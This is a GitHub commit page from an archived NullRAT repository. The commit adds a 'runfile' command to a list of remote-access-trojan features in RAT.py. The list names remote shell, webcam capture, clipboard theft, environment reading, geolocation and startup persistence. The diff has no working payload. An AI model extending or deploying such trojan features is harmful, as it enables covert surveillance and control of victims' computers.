Skip to content
This repository was archived by the owner on Mar 6, 2026. It is now read-only.

Commit b5c2395

Browse files
committed
Add runfile to NullRAT main
1 parent 313a820 commit b5c2395

1 file changed

Lines changed: 1 addition & 0 deletions

File tree

NullRAT/RAT.py

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -169,6 +169,7 @@ async def second_button_callback(self, button, interaction):
169169
"shell", # /cmd & /powershell
170170
"getenv", # /get_environment
171171
"webcam", # /get_webcam
172+
"runfile", # /runfile
172173
"clipboard", # /get_clipboard
173174
"startup", # /startup
174175
"geolocate", # /get_geolocation

0 commit comments

Comments
 (0)